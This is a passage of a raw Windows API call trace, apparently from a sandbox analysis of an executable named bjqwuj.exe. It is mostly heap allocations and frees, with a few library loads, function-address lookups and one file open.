lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.280] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.281] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.281] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.281] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.281] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.281] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.281] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.281] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.281] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0077.281] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.282] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0077.282] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.283] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.283] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.283] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.283] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.283] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.283] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.283] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.283] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0077.283] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.283] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0077.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.284] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76abb0 [0077.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76abb0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0077.284] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.284] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0077.284] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.284] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0077.284] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0077.284] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0077.284] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.284] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.284] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76abb0 [0077.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76abb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0077.284] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.284] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0077.284] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0077.284] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0077.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0077.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0077.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0077.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0077.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0077.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0077.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0077.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10001) returned 0x771fe8 [0077.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0077.285] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x31) returned 0x6b8978 [0077.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", cchWideChar=49, lpMultiByteStr=0x6b8978, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", lpUsedDefaultChar=0x0) returned 49 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.285] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0077.285] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bjqwuj.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0077.286] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0077.286] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0077.286] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0077.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=49, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0077.286] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x62) returned 0x6a0b38 [0077.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=49, lpWideCharStr=0x6a0b38, cchWideChar=49 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe") returned 49 [0077.287] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d7a8 [0077.287] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0b38 | out: hHeap=0x650000) returned 1 [0077.287] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0077.287] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0077.287] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0077.287] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0077.287] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0077.287] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0077.287] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0077.287] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0077.287] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0077.288] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0077.288] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0077.288] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0077.289] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0077.290] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0077.290] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0077.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.291] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0077.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0077.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0077.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0077.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0077.291] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0077.291] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0077.291] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 